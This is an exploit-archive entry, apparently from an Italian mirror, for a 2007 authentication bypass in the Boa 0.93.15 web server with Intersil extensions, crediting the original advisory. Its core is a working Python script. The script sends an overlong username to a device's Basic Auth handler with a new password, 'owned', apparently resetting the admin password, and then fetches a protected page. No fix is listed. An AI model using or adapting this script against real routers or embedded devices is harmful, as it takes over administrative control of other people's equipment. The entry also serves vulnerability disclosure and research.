Boa 0.93.15 HTTP Basic Authentication Bypass Exploit

2007-10-16 00:00:00

/*
* Boa HTTP Basic Authentication Bypass
* Vuln: Boa/0.93.15 (with Intersil Extensions)
*
* Original Advisory:
* http://www.securityfocus.com/archive/1/479434
* http://www.ikkisoft.com/stuff/SN-2007-02.txt
*
* Luca "ikki" Carettoni
* http://www.ikkisoft.com
*/

----

#!/usr/bin/env python
import urllib2

SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME
= 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'

auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.